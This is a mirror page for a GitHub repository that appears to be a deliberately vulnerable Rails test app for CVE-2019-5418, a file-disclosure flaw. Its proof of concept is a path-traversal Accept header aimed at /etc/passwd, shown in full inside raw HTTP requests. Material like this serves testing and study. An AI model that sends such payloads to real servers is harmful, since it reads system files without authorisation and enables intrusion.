Giters

omarkurt / CVE-2019-5418

File Content Disclosure on Rails Test Case - CVE-2019-5418

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

cve-2019-5418rorvulnerable-app

CVE-2019-5418 Test case

Run :

$ rails s

PoC :

Accept: ../../../../../../../../etc/passwd{{

Req 1 -

GET /shitblock HTTP/1.1
Host: REDACTED:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: diyarbakir_guzel_baglar_delale_lorke <------ CATCH
Content-Length: 306
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: firstVisit=1552167456698; CSRF-Token-HOYYT=grQmu9F3Y5hazpvr6T5TtWKj4HqPFhea; sessionid-HOYYT=i3VkCeXtjRJJHUxc7xEEjbecD53xbvaN
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

normal-request

Req 2 -

GET /shitblock HTTP/1.1
Host: REDACTED:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: ../../../../../../../../etc/passwd{{
Content-Length: 306
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: firstVisit=1552167456698; CSRF-Token-HOYYT=grQmu9F3Y5hazpvr6T5TtWKj4HqPFhea; sessionid-HOYYT=i3VkCeXtjRJJHUxc7xEEjbecD53xbvaN
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

PoC

Source : File Content Disclosure on Rail - CVE-2019-5418

About

File Content Disclosure on Rails Test Case - CVE-2019-5418

cve-2019-5418rorvulnerable-app

Languages

Language:Ruby 77.6%Language:HTML 16.0%Language:JavaScript 3.3%Language:CSS 2.5%Language:CoffeeScript 0.6%